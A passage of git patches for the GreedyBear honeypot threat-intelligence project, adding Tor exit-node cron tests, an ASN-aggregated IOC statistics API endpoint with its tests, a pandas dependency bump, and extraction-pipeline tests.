+ TorExitNodesCron().execute()
diff --git a/tests/test_tor.py b/tests/test_tor.py
new file mode 100644
index 00000000..7b403a67
--- /dev/null
+++ b/tests/test_tor.py
@@ -0,0 +1,97 @@
+from unittest.mock import Mock, patch
+
+import requests
+
+from greedybear.cronjobs.repositories.tor import TorRepository
+from greedybear.cronjobs.tor_exit_nodes import TorExitNodesCron
+from tests import CustomTestCase
+
+
+class TestTorRepository(CustomTestCase):
+ """Test cases for TorRepository."""
+
+ def setUp(self):
+ """Set up test fixtures."""
+ self.repo = TorRepository()
+
+ @patch("greedybear.models.TorExitNode.objects.get_or_create")
+ def test_get_or_create_new_tor_node(self, mock_get_or_create):
+ """Test creating a new Tor exit node entry."""
+ # Arrange
+ mock_node = Mock()
+ mock_get_or_create.return_value = (mock_node, True)
+
+ # Act
+ node, created = self.repo.get_or_create("1.2.3.4")
+
+ # Assert
+ self.assertTrue(created)
+ mock_get_or_create.assert_called_once_with(ip_address="1.2.3.4", defaults={"reason": "tor exit node"})
+
+ @patch("greedybear.models.TorExitNode.objects.get_or_create")
+ def test_get_or_create_existing_tor_node(self, mock_get_or_create):
+ """Test getting an existing Tor exit node entry."""
+ # Arrange
+ mock_node = Mock()
+ mock_get_or_create.return_value = (mock_node, False)
+
+ # Act
+ node, created = self.repo.get_or_create("1.2.3.4")
+
+ # Assert
+ self.assertFalse(created)
+
+
+class TestTorExitNodesCron(CustomTestCase):
+ """Test cases for TorExitNodesCron."""
+
+ def setUp(self):
+ """Set up test fixtures."""
+ self.mock_tor_repo = Mock()
+ self.mock_ioc_repo = Mock()
+ self.cron = TorExitNodesCron(tor_repo=self.mock_tor_repo, ioc_repo=self.mock_ioc_repo)
+
+ @patch("greedybear.cronjobs.tor_exit_nodes.requests.get")
+ @patch("greedybear.cronjobs.tor_exit_nodes.is_valid_ipv4")
+ def test_run_success(self, mock_is_valid, mock_requests_get):
+ """Test successful Tor exit nodes fetching."""
+ # Arrange
+ mock_response = Mock()
+ mock_response.text = "ExitAddress 1.2.3.4\\nExitAddress 5.6.7.8"
+ mock_requests_get.return_value = mock_response
+
+ # Mock validation to return valid for both IPs
+ mock_is_valid.side_effect = [(True, "1.2.3.4"), (True, "5.6.7.8")]
+
+ # Mock repository to return created=True
+ self.mock_tor_repo.get_or_create.side_effect = [(Mock(), True), (Mock(), True)]
+
+ # Act
+ self.cron.run()
+
+ # Assert
+ mock_requests_get.assert_called_once_with("https://check.torproject.org/exit-addresses", timeout=10)
+ self.assertEqual(self.mock_tor_repo.get_or_create.call_count, 2)
+ self.assertEqual(self.mock_ioc_repo.update_ioc_reputation.call_count, 2)
+
+ @patch("greedybear.cronjobs.tor_exit_nodes.requests.get")
+ def test_run_request_failure(self, mock_requests_get):
+ """Test handling of request failures."""
+ # Arrange
+ mock_requests_get.side_effect = requests.RequestException("Network error")
+
+ # Act & Assert
+ with self.assertRaises(requests.RequestException):
+ self.cron.run()
+
+ @patch("greedybear.cronjobs.tor_exit_nodes.is_valid_ipv4")
+ def test_update_old_ioc(self, mock_is_valid):
+ """Test updating existing IOCs."""
+ # Arrange
+ self.mock_ioc_repo.update_ioc_reputation.return_value = True
+
+ # Act
+ self.cron._update_old_ioc("1.2.3.4")
+
+ # Assert
+ self.mock_ioc_repo.update_ioc_reputation.assert_called_once_with("1.2.3.4", "tor exit node")
From 82713d4cc9cf247864bcb414c1fbc11494cec756 Mon Sep 17 00:00:00 2001
From: Dorna Raj Gyawali
Date: Tue, 27 Jan 2026 17:17:43 +0545
Subject: [PATCH 62/75] feat(api): add ASN-aggregated IOC statistics . CLOSES
#458 (#718)
* feat(api): add ASN-aggregated IOC statistics
* refactor: db level aggregation
* refactor: missing args
* resolve linter issue
* refactor: agg logic
* chores: minor issues resolved
---
api/serializers.py | 26 +++++++
api/urls.py | 2 +
api/views/feeds.py | 45 +++++++++++
api/views/utils.py | 93 +++++++++++++++++++---
tests/test_views.py | 182 +++++++++++++++++++++++++++++++++++++++++++-
5 files changed, 335 insertions(+), 13 deletions(-)
diff --git a/api/serializers.py b/api/serializers.py
index 83b9da1a..ba2b0ce9 100644
--- a/api/serializers.py
+++ b/api/serializers.py
@@ -118,6 +118,32 @@ def validate_ordering(self, ordering):
return ordering_validation(ordering)
+class ASNFeedsOrderingSerializer(FeedsRequestSerializer):
+ ALLOWED_ORDERING_FIELDS = frozenset(
+ {
+ "asn",
+ "ioc_count",
+ "total_attack_count",
+ "total_interaction_count",
+ "total_login_attempts",
+ "expected_ioc_count",
+ "expected_interactions",
+ "first_seen",
+ "last_seen",
+ }
+ )
+
+ def validate_ordering(self, ordering):
+ field_name = ordering.lstrip("-").strip()
+
+ if field_name not in self.ALLOWED_ORDERING_FIELDS:
+ raise serializers.ValidationError(
+ f"Invalid ordering field for ASN aggregated feed: '{field_name}'. Allowed fields: {', '.join(sorted(self.ALLOWED_ORDERING_FIELDS))}"
+ )
+
+ return ordering
+
+
class FeedsResponseSerializer(serializers.Serializer):
"""
Serializer for feed response data structure.
diff --git a/api/urls.py b/api/urls.py
index 7202fc10..f426151e 100644
--- a/api/urls.py
+++ b/api/urls.py
@@ -10,6 +10,7 @@
enrichment_view,
feeds,
feeds_advanced,
+ feeds_asn,
feeds_pagination,
general_honeypot_list,
)
@@ -22,6 +23,7 @@
urlpatterns = [
path("feeds/", feeds_pagination),
path("feeds/advanced/", feeds_advanced),
+ path("feeds/asn/", feeds_asn),
path("feeds///.", feeds),
path("enrichment", enrichment_view),
path("cowrie_session", cowrie_session_view),
diff --git a/api/views/feeds.py b/api/views/feeds.py
index 617df2ac..c6e56524 100644
--- a/api/views/feeds.py
+++ b/api/views/feeds.py
@@ -10,9 +10,12 @@
permission_classes,
)
from rest_framework.permissions import IsAuthenticated
+from rest_framework.response import Response
+from api.serializers import ASNFeedsOrderingSerializer
from api.views.utils import (
FeedRequestParams,
+ asn_aggregated_queryset,
feeds_response,
get_queryset,
get_valid_feed_types,
@@ -116,3 +119,45 @@ def feeds_advanced(request):
resp_data = feeds_response(iocs, feed_params, valid_feed_types, dict_only=True, verbose=verbose)
return paginator.get_paginated_response(resp_data)
return feeds_response(iocs_queryset, feed_params, valid_feed_types, verbose=verbose)
+
+
+@api_view(["GET"])
+@authentication_classes([CookieTokenAuthentication])
+@permission_classes([IsAuthenticated])
+def feeds_asn(request):
+ """
+ Retrieve aggregated IOC feed data grouped by ASN (Autonomous System Number).
+
+ Args:
+ request: The HTTP request object.
+ feed_type (str): Filter by feed type (e.g., 'cowrie', 'log4j'). Default: 'all'.
+ attack_type (str): Filter by attack type (e.g., 'scanner', 'payload_request'). Default: 'all'.
+ max_age (int): Maximum age of IOCs in days. Default: 3.
+ min_days_seen (int): Minimum days an IOC must have been observed. Default: 1.
+ exclude_reputation (str): ';'-separated reputations to exclude (e.g., 'mass scanner'). Default: none.
+ ordering (str): Aggregation ordering field (e.g., 'total_attack_count', 'asn'). Default: '-ioc_count'.
+ asn (str, optional): Filter results to a single ASN.
+
+ Returns:
+ Response: HTTP response with a JSON list of ASN aggregation objects.
+ Each object contains:
+ asn (int): ASN number.
+ ioc_count (int): Number of IOCs for this ASN.
+ total_attack_count (int): Sum of attack_count for all IOCs.
+ total_interaction_count (int): Sum of interaction_count for all IOCs.
+ total_login_attempts (int): Sum of login_attempts for all IOCs.
+ honeypots (List[str]): Sorted list of unique honeypots that observed these IOCs.
+ expected_ioc_count (float): Sum of recurrence_probability for all IOCs, rounded to 4 decimals.
+ expected_interactions (float): Sum of expected_interactions for all IOCs, rounded to 4 decimals.
+ first_seen (DateTime): Earliest first_seen timestamp among IOCs.
+ last_seen (DateTime): Latest last_seen timestamp among IOCs.
+ """
+ logger.info(f"request /api/feeds/asn/ with params: {request.query_params}")
+ feed_params = FeedRequestParams(request.query_params)
+ valid_feed_types = get_valid_feed_types()
+
+ iocs_qs = get_queryset(request, feed_params, valid_feed_types, is_aggregated=True, serializer_class=ASNFeedsOrderingSerializer)
+
+ asn_aggregates = asn_aggregated_queryset(iocs_qs, request, feed_params)
+ data = list(asn_aggregates)
+ return Response(data)
diff --git a/api/views/utils.py b/api/views/utils.py
index cded1e9b..1bd77d89 100644
--- a/api/views/utils.py
+++ b/api/views/utils.py
@@ -8,7 +8,7 @@
from django.conf import settings
from django.contrib.postgres.aggregates import ArrayAgg
-from django.db.models import F
+from django.db.models import Count, F, Max, Min, Sum
from django.http import HttpResponse, HttpResponseBadRequest, StreamingHttpResponse
from rest_framework import status
from rest_framework.response import Response
@@ -121,7 +121,7 @@ def get_valid_feed_types() -> frozenset[str]:
return frozenset(feed_types)
-def get_queryset(request, feed_params, valid_feed_types):
+def get_queryset(request, feed_params, valid_feed_types, is_aggregated=False, serializer_class=FeedsRequestSerializer):
"""
Build a queryset to filter IOC data based on the request parameters.
@@ -129,6 +129,15 @@ def get_queryset(request, feed_params, valid_feed_types):
request: The incoming request object.
feed_params: A FeedRequestParams instance.
valid_feed_types (frozenset): The set of all valid feed types.
+ is_aggregated (bool, optional):
+ - If True, disables slicing (`feed_size`) and model-level ordering.
+ - Ensures full dataset is available for aggregation or specialized computation.
+ - Default: False.
+ serializer_class (class, optional):
+ - Serializer class used to validate request parameters.
+ - Allows injecting a custom serializer to enforce rules for specific feed types
+ (e.g., to restrict ordering fields or validation for specialized feeds).
+ - Default: `FeedsRequestSerializer`.
Returns:
QuerySet: The filtered queryset of IOC data.
@@ -139,7 +148,7 @@ def get_queryset(request, feed_params, valid_feed_types):
f"Age: {feed_params.max_age}, format: {feed_params.format}"
)
- serializer = FeedsRequestSerializer(
+ serializer = serializer_class(
data=vars(feed_params),
context={"valid_feed_types": valid_feed_types},
)
@@ -161,15 +170,14 @@ def get_queryset(request, feed_params, valid_feed_types):
if feed_params.include_reputation:
query_dict["ip_reputation__in"] = feed_params.include_reputation
- iocs = (
- IOC.objects.filter(**query_dict)
- .filter(general_honeypot__active=True)
- .exclude(ip_reputation__in=feed_params.exclude_reputation)
- .annotate(value=F("name"))
- .annotate(honeypots=ArrayAgg("general_honeypot__name"))
- .distinct()
- .order_by(feed_params.ordering)[: int(feed_params.feed_size)]
- )
+ iocs = IOC.objects.filter(**query_dict).exclude(ip_reputation__in=feed_params.exclude_reputation).annotate(value=F("name")).distinct()
+
+ # aggregated feeds calculate metrics differently and need all rows to be accurate.
+ if not is_aggregated:
+ iocs = iocs.filter(general_honeypot__active=True)
+ iocs = iocs.annotate(honeypots=ArrayAgg("general_honeypot__name"))
+ iocs = iocs.order_by(feed_params.ordering)
+ iocs = iocs[: int(feed_params.feed_size)]
# save request source for statistics
source_ip = str(request.META["REMOTE_ADDR"])
@@ -317,3 +325,64 @@ def is_sha256hash(string: str) -> bool:
bool: True if the string is a valid SHA-256 hash, False otherwise
"""
return bool(re.fullmatch(r"^[A-Fa-f0-9]{64}$", string))
+
+
+def asn_aggregated_queryset(iocs_qs, request, feed_params):
+ """
+ Perform DB-level aggregation grouped by ASN.
+
+ Args
+ iocs_qs (QuerySet): Filtered IOC queryset from get_queryset;
+ request (Request): The API request object;
+ feed_params (FeedRequestParams): Validated parameter object
+
+ Returns: A values-grouped queryset with annotated metrics and honeypot arrays.
+ """
+ asn_filter = request.query_params.get("asn")
+ if asn_filter:
+ iocs_qs = iocs_qs.filter(asn=asn_filter)
+
+ # default ordering is overridden here because of serializer default(-last-seen) behaviour
+ ordering = feed_params.ordering
+ if not ordering or ordering.strip() in {"", "-last_seen", "last_seen"}:
+ ordering = "-ioc_count"
+
+ numeric_agg = (
+ iocs_qs.exclude(asn__isnull=True)
+ .values("asn")
+ .annotate(
+ ioc_count=Count("id"),
+ total_attack_count=Sum("attack_count"),
+ total_interaction_count=Sum("interaction_count"),
+ total_login_attempts=Sum("login_attempts"),
+ expected_ioc_count=Sum("recurrence_probability"),
+ expected_interactions=Sum("expected_interactions"),
+ first_seen=Min("first_seen"),
+ last_seen=Max("last_seen"),
+ )
+ .order_by(ordering)
+ )
+
+ honeypot_agg = (
+ iocs_qs.exclude(asn__isnull=True)
+ .filter(general_honeypot__active=True)
+ .values("asn")
+ .annotate(
+ honeypots=ArrayAgg(
+ "general_honeypot__name",
+ distinct=True,
+ )
+ )
+ )
+
+ hp_lookup = {row["asn"]: row["honeypots"] or [] for row in honeypot_agg}
+
+ # merging numeric aggregate with honeypot names for each asn
+ result = []
+ for row in numeric_agg:
+ asn = row["asn"]
+ row_dict = dict(row)
+ row_dict["honeypots"] = sorted(hp_lookup.get(asn, []))
+ result.append(row_dict)
+
+ return result
diff --git a/tests/test_views.py b/tests/test_views.py
index fe869d60..c09f01ea 100644
--- a/tests/test_views.py
+++ b/tests/test_views.py
@@ -1,9 +1,10 @@
from django.conf import settings
from django.test import override_settings
+from django.utils import timezone
from rest_framework.test import APIClient
from api.views.utils import is_ip_address, is_sha256hash
-from greedybear.models import GeneralHoneypot, Statistics, ViewType
+from greedybear.models import IOC, GeneralHoneypot, Statistics, ViewType
from . import CustomTestCase
@@ -271,6 +272,185 @@ def test_400_feeds_pagination(self):
self.assertEqual(response.status_code, 400)
+class FeedsASNViewTestCase(CustomTestCase):
+ """Tests for ASN aggregated feeds API"""
+
+ @classmethod
+ def setUpClass(cls):
+ super().setUpClass()
+ IOC.objects.all().delete()
+ cls.testpot1, _ = GeneralHoneypot.objects.get_or_create(name="testpot1", active=True)
+ cls.testpot2, _ = GeneralHoneypot.objects.get_or_create(name="testpot2", active=True)
+
+ cls.high_asn = "13335"
+ cls.low_asn = "16276"
+
+ cls.ioc_high1 = IOC.objects.create(
+ name="high1.example.com",
+ type="ip",
+ asn=cls.high_asn,
+ attack_count=15,
+ interaction_count=30,
+ login_attempts=5,
+ first_seen=timezone.now() - timezone.timedelta(days=10),
+ recurrence_probability=0.8,
+ expected_interactions=20.0,
+ )
+ cls.ioc_high1.general_honeypot.add(cls.testpot1, cls.testpot2)
+ cls.ioc_high1.save()
+
+ cls.ioc_high2 = IOC.objects.create(
+ name="high2.example.com",
+ type="ip",
+ asn=cls.high_asn,
+ attack_count=5,
+ interaction_count=10,
+ login_attempts=2,
+ first_seen=timezone.now() - timezone.timedelta(days=5),
+ recurrence_probability=0.3,
+ expected_interactions=8.0,
+ )
+ cls.ioc_high2.general_honeypot.add(cls.testpot1, cls.testpot2)
+ cls.ioc_high2.save()
+
+ cls.ioc_low = IOC.objects.create(
+ name="low.example.com",
+ type="ip",
+ asn=cls.low_asn,
+ attack_count=2,
+ interaction_count=5,
+ login_attempts=1,
+ first_seen=timezone.now(),
+ recurrence_probability=0.1,
+ expected_interactions=3.0,
+ )
+ cls.ioc_low.general_honeypot.add(cls.testpot1, cls.testpot2)
+ cls.ioc_low.save()
+
+ def setUp(self):
+ self.client = APIClient()
+ self.client.force_authenticate(user=self.superuser)
+ self.url = "/api/feeds/asn/"
+
+ def _get_results(self, response):
+ payload = response.json()
+ self.assertIsInstance(payload, list)
+ return payload
+
+ def test_200_asn_feed_aggregated_fields(self):
+ """Ensure aggregated fields are computed correctly per ASN using dynamic sums"""
+ response = self.client.get(self.url)
+ self.assertEqual(response.status_code, 200)
+ results = self._get_results(response)
+
+ # filtering high ASN
+ high_item = next((item for item in results if str(item["asn"]) == self.high_asn), None)
+ self.assertIsNotNone(high_item)
+
+ # getting all IOCs for high ASN from the DB
+ high_iocs = IOC.objects.filter(asn=self.high_asn)
+
+ self.assertEqual(high_item["ioc_count"], high_iocs.count())
+ self.assertEqual(high_item["total_attack_count"], sum(i.attack_count for i in high_iocs))
+ self.assertEqual(high_item["total_interaction_count"], sum(i.interaction_count for i in high_iocs))
+ self.assertEqual(high_item["total_login_attempts"], sum(i.login_attempts for i in high_iocs))
+ self.assertAlmostEqual(high_item["expected_ioc_count"], sum(i.recurrence_probability for i in high_iocs))
+ self.assertAlmostEqual(high_item["expected_interactions"], sum(i.expected_interactions for i in high_iocs))
+
+ # validating first_seen / last_seen dynamically
+ self.assertEqual(high_item["first_seen"], min(i.first_seen for i in high_iocs).isoformat())
+ self.assertEqual(high_item["last_seen"], max(i.last_seen for i in high_iocs).isoformat())
+
+ # validating honeypots dynamically
+ expected_honeypots = sorted({hp.name for i in high_iocs for hp in i.general_honeypot.all()})
+ self.assertEqual(sorted(high_item["honeypots"]), expected_honeypots)
+
+ def test_200_asn_feed_default_ordering(self):
+ response = self.client.get(self.url)
+ self.assertEqual(response.status_code, 200)
+ results = self._get_results(response)
+
+ # high_asn has ioc_count=2 > low_asn ioc_count=1
+ self.assertEqual(str(results[0]["asn"]), self.high_asn)
+ self.assertEqual(str(results[1]["asn"]), self.low_asn)
+
+ def test_200_asn_feed_ordering_desc_ioc_count(self):
+ response = self.client.get(self.url + "?ordering=-ioc_count")
+ self.assertEqual(response.status_code, 200)
+ results = self._get_results(response)
+
+ self.assertEqual(str(results[0]["asn"]), self.high_asn)
+
+ def test_200_asn_feed_ordering_asc_ioc_count(self):
+ response = self.client.get(self.url + "?ordering=ioc_count")
+ self.assertEqual(response.status_code, 200)
+ results = self._get_results(response)
+ self.assertEqual(str(results[0]["asn"]), self.low_asn)
+
+ def test_200_asn_feed_ordering_desc_interaction_count(self):
+ response = self.client.get(self.url + "?ordering=-total_interaction_count")
+ self.assertEqual(response.status_code, 200)
+ results = self._get_results(response)
+ self.assertEqual(str(results[0]["asn"]), self.high_asn)
+
+ def test_200_asn_feed_with_asn_filter(self):
+ response = self.client.get(self.url + f"?asn={self.high_asn}")
+ self.assertEqual(response.status_code, 200)
+
+ results = self._get_results(response)
+ self.assertEqual(len(results), 1)
+ self.assertEqual(str(results[0]["asn"]), self.high_asn)
+
+ def test_400_asn_feed_invalid_ordering_honeypots(self):
+ response = self.client.get(self.url + "?ordering=honeypots")
+ self.assertEqual(response.status_code, 400)
+ data = response.json()
+ errors_container = data.get("errors", data)
+ error_list = errors_container.get("ordering", [])
+ self.assertTrue(error_list)
+ error_msg = error_list[0].lower()
+ self.assertIn("honeypots", error_msg)
+ self.assertIn("invalid", error_msg)
+
+ def test_400_asn_feed_invalid_ordering_random(self):
+ response = self.client.get(self.url + "?ordering=xyz123")
+ self.assertEqual(response.status_code, 400)
+ data = response.json()
+ errors_container = data.get("errors", data)
+ error_list = errors_container.get("ordering", [])
+ self.assertTrue(error_list)
+ error_msg = error_list[0].lower()
+ self.assertIn("xyz123", error_msg)
+ self.assertIn("invalid", error_msg)
+
+ def test_400_asn_feed_invalid_ordering_model_field_not_in_agg(self):
+ response = self.client.get(self.url + "?ordering=attack_count")
+ self.assertEqual(response.status_code, 400)
+ data = response.json()
+ errors_container = data.get("errors", data)
+ error_list = errors_container.get("ordering", [])
+ self.assertTrue(error_list)
+ error_msg = error_list[0].lower()
+ self.assertIn("attack_count", error_msg)
+ self.assertIn("invalid", error_msg)
+
+ def test_400_asn_feed_ordering_empty_param(self):
+ response = self.client.get(self.url + "?ordering=")
+ self.assertEqual(response.status_code, 400)
+ data = response.json()
+ errors_container = data.get("errors", data)
+ error_list = errors_container.get("ordering", [])
+ self.assertTrue(error_list)
+ error_msg = error_list[0].lower()
+ self.assertIn("blank", error_msg)
+
+ def test_asn_feed_ignores_feed_size(self):
+ response = self.client.get(self.url + "?feed_size=1")
+ results = response.json()
+ # aggregation should return all ASNs regardless of feed_size
+ self.assertEqual(len(results), 2)
+
+
class StatisticsViewTestCase(CustomTestCase):
@classmethod
def setUpClass(cls):
From bcbc9507a518f9c01e7f2985c856291835b05732 Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Wed, 28 Jan 2026 10:10:01 +0100
Subject: [PATCH 63/75] Bump pandas from 2.3.3 to 3.0.0 in /requirements (#736)
Bumps [pandas](https://github.com/pandas-dev/pandas) from 2.3.3 to 3.0.0.
- [Release notes](https://github.com/pandas-dev/pandas/releases)
- [Commits](https://github.com/pandas-dev/pandas/compare/v2.3.3...v3.0.0)
---
updated-dependencies:
- dependency-name: pandas
dependency-version: 3.0.0
dependency-type: direct:production
update-type: version-update:semver-major
...
Signed-off-by: dependabot[bot]
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
---
requirements/project-requirements.txt | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/requirements/project-requirements.txt b/requirements/project-requirements.txt
index 27a45d8f..b1f1a23e 100644
--- a/requirements/project-requirements.txt
+++ b/requirements/project-requirements.txt
@@ -17,7 +17,7 @@ uwsgitop==0.12
uwsgi==2.0.31
joblib==1.5.3
-pandas==2.3.3
+pandas==3.0.0
scikit-learn==1.8.0
numpy==2.4.1
datasketch==1.9.0
From 66b38a4dc8abdc5a6bbadce290acb64837bace69 Mon Sep 17 00:00:00 2001
From: Krishna Awasthi <140143710+opbot-xd@users.noreply.github.com>
Date: Wed, 28 Jan 2026 17:40:48 +0530
Subject: [PATCH 64/75] Create end-to-end extraction pipeline tests. Progresses
#636 (#735)
* feat: Add end-to-end tests for ExtractionPipeline (PR 1/2) #636
* test: verify search time window in execute flow
* test: verify grouping logic ensures strategies receive correct hits
* chore: remove unused mock assignments in extraction tests
* test: verify IOC accumulation from multiple strategies
* refactor: standardize TestExecuteEmptyResponse with mock helper
* refactor: use common ExtractionTestCase base class
* test: check for whitespace-only src_ip skipping
* test: check for whitespace-only type skipping
* refactor: deduplicate _create_pipeline_with_mocks into base class
* test: verify exception logging in pipeline strategy execution
* test: explicit patch LEGACY_EXTRACTION in sensor test
* refactor: move MockElasticHit to tests/__init__.py for shared usage
---
tests/__init__.py | 19 +
.../cronjobs/test_extraction_pipeline.py | 380 ++++++++++++++++++
2 files changed, 399 insertions(+)
create mode 100644 tests/greedybear/cronjobs/test_extraction_pipeline.py
diff --git a/tests/__init__.py b/tests/__init__.py
index 690676f3..186afdca 100644
--- a/tests/__init__.py
+++ b/tests/__init__.py
@@ -226,3 +226,22 @@ def _create_mock_ioc(
mock.asn = asn
mock.number_of_days_seen = len(mock.days_seen)
return mock
+
+
+class MockElasticHit:
+ """Mock Elasticsearch hit that behaves like AttrDict from elasticsearch-dsl."""
+
+ def __init__(self, data: dict):
+ self._data = data
+
+ def __getitem__(self, key):
+ return self._data[key]
+
+ def __contains__(self, key):
+ return key in self._data
+
+ def get(self, key, default=None):
+ return self._data.get(key, default)
+
+ def to_dict(self):
+ return self._data.copy()
diff --git a/tests/greedybear/cronjobs/test_extraction_pipeline.py b/tests/greedybear/cronjobs/test_extraction_pipeline.py
new file mode 100644
index 00000000..bcd9aaea
--- /dev/null
+++ b/tests/greedybear/cronjobs/test_extraction_pipeline.py
@@ -0,0 +1,380 @@
+# This file is a part of GreedyBear https://github.com/honeynet/GreedyBear
+# See the file 'LICENSE' for copying permission.
+"""
+End-to-end tests for the ExtractionPipeline class.
+
+Tests the complete extraction workflow from Elasticsearch hits
+through strategy selection, IOC extraction, and scoring.
+"""
+
+from unittest.mock import MagicMock, patch
+
+from tests import ExtractionTestCase, MockElasticHit
+
+
+class ExtractionPipelineTestCase(ExtractionTestCase):
+ """Base test case for extraction pipeline tests, reusing common extraction helpers."""
+
+ def _create_pipeline_with_mocks(self):
+ """Helper to create a pipeline with mocked dependencies."""
+ with (
+ patch("greedybear.cronjobs.extraction.pipeline.SensorRepository"),
+ patch("greedybear.cronjobs.extraction.pipeline.IocRepository"),
+ patch("greedybear.cronjobs.extraction.pipeline.ElasticRepository"),
+ ):
+ from greedybear.cronjobs.extraction.pipeline import ExtractionPipeline
+
+ pipeline = ExtractionPipeline()
+ return pipeline
+
+
+class TestExtractionPipelineInit(ExtractionPipelineTestCase):
+ """Tests for ExtractionPipeline initialization."""
+
+ @patch("greedybear.cronjobs.extraction.pipeline.SensorRepository")
+ @patch("greedybear.cronjobs.extraction.pipeline.IocRepository")
+ @patch("greedybear.cronjobs.extraction.pipeline.ElasticRepository")
+ def test_initializes_repositories(self, mock_elastic, mock_ioc, mock_sensor):
+ """Pipeline should initialize all required repositories."""
+ from greedybear.cronjobs.extraction.pipeline import ExtractionPipeline
+
+ pipeline = ExtractionPipeline()
+
+ mock_elastic.assert_called_once()
+ mock_ioc.assert_called_once()
+ mock_sensor.assert_called_once()
+ self.assertIsNotNone(pipeline.log)
+
+
+class TestMinutesBackToLookup(ExtractionPipelineTestCase):
+ """Tests for the _minutes_back_to_lookup property."""
+
+ @patch("greedybear.cronjobs.extraction.pipeline.LEGACY_EXTRACTION", False)
+ @patch("greedybear.cronjobs.extraction.pipeline.EXTRACTION_INTERVAL", 5)
+ @patch("greedybear.cronjobs.extraction.pipeline.INITIAL_EXTRACTION_TIMESPAN", 120)
+ @patch("greedybear.cronjobs.extraction.pipeline.SensorRepository")
+ @patch("greedybear.cronjobs.extraction.pipeline.IocRepository")
+ @patch("greedybear.cronjobs.extraction.pipeline.ElasticRepository")
+ def test_returns_initial_timespan_when_empty(self, mock_elastic, mock_ioc, mock_sensor):
+ """Should return INITIAL_EXTRACTION_TIMESPAN on first run (empty DB)."""
+ from greedybear.cronjobs.extraction.pipeline import ExtractionPipeline
+
+ pipeline = ExtractionPipeline()
+ pipeline.ioc_repo.is_empty.return_value = True
+
+ result = pipeline._minutes_back_to_lookup
+
+ self.assertEqual(result, 120)
+
+ @patch("greedybear.cronjobs.extraction.pipeline.LEGACY_EXTRACTION", False)
+ @patch("greedybear.cronjobs.extraction.pipeline.EXTRACTION_INTERVAL", 5)
+ @patch("greedybear.cronjobs.extraction.pipeline.SensorRepository")
+ @patch("greedybear.cronjobs.extraction.pipeline.IocRepository")
+ @patch("greedybear.cronjobs.extraction.pipeline.ElasticRepository")
+ def test_returns_extraction_interval_when_not_empty(self, mock_elastic, mock_ioc, mock_sensor):
+ """Should return EXTRACTION_INTERVAL for subsequent runs."""
+ from greedybear.cronjobs.extraction.pipeline import ExtractionPipeline
+
+ pipeline = ExtractionPipeline()
+ pipeline.ioc_repo.is_empty.return_value = False
+
+ result = pipeline._minutes_back_to_lookup
+
+ self.assertEqual(result, 5)
+
+ @patch("greedybear.cronjobs.extraction.pipeline.LEGACY_EXTRACTION", True)
+ @patch("greedybear.cronjobs.extraction.pipeline.EXTRACTION_INTERVAL", 5)
+ @patch("greedybear.cronjobs.extraction.pipeline.SensorRepository")
+ @patch("greedybear.cronjobs.extraction.pipeline.IocRepository")
+ @patch("greedybear.cronjobs.extraction.pipeline.ElasticRepository")
+ def test_returns_11_for_legacy_extraction(self, mock_elastic, mock_ioc, mock_sensor):
+ """Should return 11 when LEGACY_EXTRACTION is enabled."""
+ from greedybear.cronjobs.extraction.pipeline import ExtractionPipeline
+
+ pipeline = ExtractionPipeline()
+ pipeline.ioc_repo.is_empty.return_value = False
+
+ result = pipeline._minutes_back_to_lookup
+
+ self.assertEqual(result, 11)
+
+
+class TestExecuteHitGrouping(ExtractionPipelineTestCase):
+ """Tests for hit grouping logic in execute()."""
+
+ @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+ @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
+ def test_skips_hits_without_src_ip(self, mock_factory, mock_scores):
+ """Hits without src_ip should be skipped."""
+ pipeline = self._create_pipeline_with_mocks()
+ pipeline.elastic_repo.search.return_value = [
+ MockElasticHit({"type": "Cowrie"}), # missing src_ip
+ MockElasticHit({"src_ip": "", "type": "Cowrie"}), # empty src_ip
+ MockElasticHit({"src_ip": " ", "type": "Cowrie"}), # whitespace-only src_ip
+ ]
+ pipeline.ioc_repo.is_empty.return_value = False
+
+ result = pipeline.execute()
+
+ self.assertEqual(result, 0)
+ mock_factory.return_value.get_strategy.assert_not_called()
+
+ @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+ @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
+ def test_skips_hits_without_type(self, mock_factory, mock_scores):
+ """Hits without type (honeypot) should be skipped."""
+ pipeline = self._create_pipeline_with_mocks()
+ pipeline.elastic_repo.search.return_value = [
+ MockElasticHit({"src_ip": "1.2.3.4"}), # missing type
+ MockElasticHit({"src_ip": "1.2.3.4", "type": ""}), # empty type
+ MockElasticHit({"src_ip": "1.2.3.4", "type": " "}), # whitespace-only type
+ ]
+ pipeline.ioc_repo.is_empty.return_value = False
+
+ result = pipeline.execute()
+
+ self.assertEqual(result, 0)
+ mock_factory.return_value.get_strategy.assert_not_called()
+
+ @patch("greedybear.cronjobs.extraction.pipeline.LEGACY_EXTRACTION", False)
+ @patch("greedybear.cronjobs.extraction.pipeline.EXTRACTION_INTERVAL", 10)
+ @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+ @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
+ def test_extracts_sensor_from_hits(self, mock_factory, mock_scores):
+ """
+ Should extract and register sensors from t-pot_ip_ext field.
+ Also verifies correct time window is passed to search().
+ """
+ pipeline = self._create_pipeline_with_mocks()
+ pipeline.elastic_repo.search.return_value = [
+ MockElasticHit({"src_ip": "1.2.3.4", "type": "Cowrie", "t-pot_ip_ext": "10.0.0.1"}),
+ ]
+ pipeline.ioc_repo.is_empty.return_value = False
+ pipeline.ioc_repo.is_ready_for_extraction.return_value = False # Skip strategy for this test
+
+ pipeline.execute()
+
+ pipeline.sensor_repo.add_sensor.assert_called_once_with("10.0.0.1")
+ pipeline.elastic_repo.search.assert_called_once_with(10)
+
+ @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+ @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
+ def test_groups_hits_by_honeypot_type(self, mock_factory, mock_scores):
+ """Hits should be grouped by honeypot type before extraction."""
+ pipeline = self._create_pipeline_with_mocks()
+ pipeline.elastic_repo.search.return_value = [
+ MockElasticHit({"src_ip": "1.2.3.4", "type": "Cowrie"}),
